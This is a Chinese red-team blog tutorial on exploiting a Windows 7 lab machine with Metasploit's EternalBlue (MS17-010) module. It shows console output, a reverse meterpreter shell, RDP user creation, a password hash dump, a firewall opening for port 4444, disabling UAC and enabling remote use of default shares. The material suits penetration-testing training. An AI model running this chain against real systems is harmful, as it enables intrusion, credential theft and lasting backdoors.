红队白帽必经之路(20)——实战之使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透[既然是红队，那就对自己狠一点]

admin管理员组

文章数量:1440163

欢迎各位彦祖与热巴畅游本人专栏与博客

你的三连是我最大的动力

以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]

专栏跑道一

➡️网络空间安全——全栈前沿技术持续深入学习 

专栏跑道二

➡️ 24 Network Security -LJS 

​

​ 

​

专栏跑道三

➡️ MYSQL REDIS Advance operation

专栏跑道四

➡️HCIP；H3C-SE;CCIP——LJS[华为、华三、思科高级网络]

​

专栏跑道五

➡️RHCE-LJS[Linux高端骚操作实战篇]​

专栏跑道六

➡️数据结构与算法[考研+实际工作应用+C程序设计]

​

专栏跑道七

➡️RHCSA-LJS[Linux初级及进阶骚技能]

上节回顾

目录

欢迎各位彦祖与热巴畅游本人专栏与博客

你的三连是我最大的动力

以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]

专栏跑道一

➡️网络空间安全——全栈前沿技术持续深入学习 

专栏跑道二

➡️ 24 Network Security -LJS 

专栏跑道三

➡️ MYSQL REDIS Advance operation

专栏跑道四

➡️HCIP；H3C-SE;CCIP——LJS[华为、华三、思科高级网络]

专栏跑道五

➡️RHCE-LJS[Linux高端骚操作实战篇]​编辑​

专栏跑道六

➡️数据结构与算法[考研+实际工作应用+C程序设计]

专栏跑道七

➡️RHCSA-LJS[Linux初级及进阶骚技能]

上节回顾

1.使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透

环境介绍：

使用 Win7 作为靶机来进行渗透测试

1.2获取 shell

首先先对主机进行扫描确认是否存在漏洞[MF四件套]

靶机存在 MS17-010 漏洞下面开始漏洞利用

开炮 

这时候get shell了就可以查看权限

1.3创建一个新用户来远程连接 win7 桌面

启用远程桌面

创建远程桌面用户

注意：

回到 Win7 查看提示信息，xuegod 要连接到当前计算机

​

静待30S后即可远程邓丽界面

1.4关闭主机防护策略并开启后门

回到 MSF 控制台，从 SAM 导出密码哈希

取刚创建的 xuegod 用户的 hash 密码

创建一条防火墙规则允许 4444 端口访问网络

补充说明为什么执行该步骤：

关闭 UAC

开启 win7 系统主机的默认共享

补充说明：

退出 shell 返回 meterpreter

我们先将 session 保存到后台

未完待续……，下期敬请期待​编辑

---

1.使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透

环境介绍：

使用 Win7 作为靶机来进行渗透测试

• Win7 环境说明:IP 地址 192.168.1.56
• Win7 旗舰版 SP1-64 位系统镜像（内有激活工具）：
• 链接：
• 提取码：fmg9
• Win7 旗舰版 SP1-64 位免安装版（已激活）密码：123456，下载解压后用 VMware 直接打开即
• 链接
• 提取码：0khh

1.2获取 shell

首先先对主机进行扫描确认是否存在漏洞[MF四件套]

msf6 exploit(multi/handler) > back
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) >  set RHOSTS 192.168.1.56
RHOSTS => 192.168.1.56
msf6 auxiliary(scanner/smb/smb_ms17_010) > ex
exit     exploit  
msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit 

靶机存在 MS17-010 漏洞下面开始漏洞利用

msf6 auxiliary(scanner/smb/smb_ms17_010) > use  exploit/windows/smb/ms17_010_eternalblue
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://docs.metasploit/docs/using-met
                                             asploit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affe
                                             cts Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7
                                              target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects
                                             Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 tar
                                             get machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Se
                                             rver 2008 R2, Windows 7, Windows Embedded Standard 7 target machin
                                             es.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.79.135   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > 

 

开炮 

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.56
RHOSTS => 192.168.1.56
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >  set payloda  windows/x64/meterpreter/reverse_tcp
[!] Unknown datastore option: payloda. Did you mean PAYLOAD?
payloda => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload  set payload
[-] The value specified for payload is not valid.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload   windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.53
LHOST => 192.168.1.53
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

这时候get shell了就可以查看权限

meterpreter > getuid

1.3创建一个新用户来远程连接 win7 桌面

启用远程桌面

meterpreter > run post/windows/manage/enable_rdp

创建远程桌面用户

run post/windows/manage/enable_rdp USERNAME=xuegod PASSWORD=123456

┌──(root㉿kali-2024)-[/home/ljs/Desktop]
└─# rdesktop 192.168.1.56

注意：

• 如果 win7 主机当前管理员用户正在使用会将管理员用户桌面锁定。

回到 Win7 查看提示信息，xuegod 要连接到当前计算机

静待30S后即可远程邓丽界面

1.4关闭主机防护策略并开启后门

回到 MSF 控制台，从 SAM 导出密码哈希

meterpreter > hashdump

取刚创建的 xuegod 用户的 hash 密码

xuegod:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba885473768
18d4:::

创建一条防火墙规则允许 4444 端口访问网络

补充说明为什么执行该步骤：

• 否则我们建立 session 时 payload 不能通过4444 端口访问网络导致 session 建立失败

meterpreter > shell
C:\Windows\system32>netsh firewall add portopening TCP 4444 "xuegod" ENABLE ALL

关闭 UAC

meterpreter > shell
C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t
REG_DWORD /d 0 /f


参数说明

ADD 添加一个注册表项
-v 创建键值
-t 键值类型
-d 键值的值
-f 强制修改注册表项

开启 win7 系统主机的默认共享

C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

参数详解如下：

cmd.exe /k

启动一个新的命令行窗口并执行命令，执行完命令后，窗口保持打开状态。

%windir%\System32\reg.exe

调用 reg.exe 工具，%windir% 是 Windows 系统目录，reg.exe 用于操作注册表。

ADD

向注册表中添加新的键值对。如果该项已存在，将被覆盖。

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system

指定要修改的注册表路径，HKLM 是 Windows 注册表中的主要分支，Policies\system 存储系统的安全策略设置。

/v LocalAccountTokenFilterPolicy

指定要添加或修改的注册表项名称为 LocalAccountTokenFilterPolicy，该项控制是否启用本地账户的访问令牌过滤。

/t REG_DWORD

指定该注册表项的值类型为 REG_DWORD，即 32 位整数。

/d 1

设置 LocalAccountTokenFilterPolicy 的值为 1，表示启用该策略，允许本地账户的访问令牌不被过滤。

/f

强制执行命令，直接覆盖已存在的注册表项值，不会提示确认

补充说明：

• 默认共享对 Windows 主机的文件共享非常方便，也方便我们利用这个功能，远程执行命令。

退出 shell 返回 meterpreter

C:\Windows\system32>exit

我们先将 session 保存到后台

meterpreter > background

未完待续……，下期敬请期待

本文标签： 必经之路就对漏洞实战是红队